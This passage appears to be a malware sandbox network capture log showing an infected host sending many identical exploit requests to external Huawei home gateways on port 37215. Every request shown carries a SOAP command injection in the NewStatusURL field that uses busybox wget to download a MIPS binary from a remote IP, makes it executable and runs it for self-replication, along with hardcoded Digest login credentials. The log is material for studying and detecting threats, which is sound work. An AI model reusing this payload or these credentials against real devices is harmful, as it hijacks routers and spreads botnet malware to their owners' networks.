3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2194192.168.2.135405241.9.209.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596262932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2195192.168.2.1346342197.163.100.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596321106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2196192.168.2.1359300183.232.118.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596476078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2197192.168.2.1355074197.110.42.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596476078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2198192.168.2.1340672157.116.73.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596497059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2199192.168.2.1333790197.105.160.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596501112 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2200192.168.2.1347582197.66.183.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596585989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2201192.168.2.1340208197.75.56.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596594095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2202192.168.2.1351166197.7.44.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596625090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2203192.168.2.1359266197.79.239.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596632004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2204192.168.2.1359882157.8.113.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596640110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
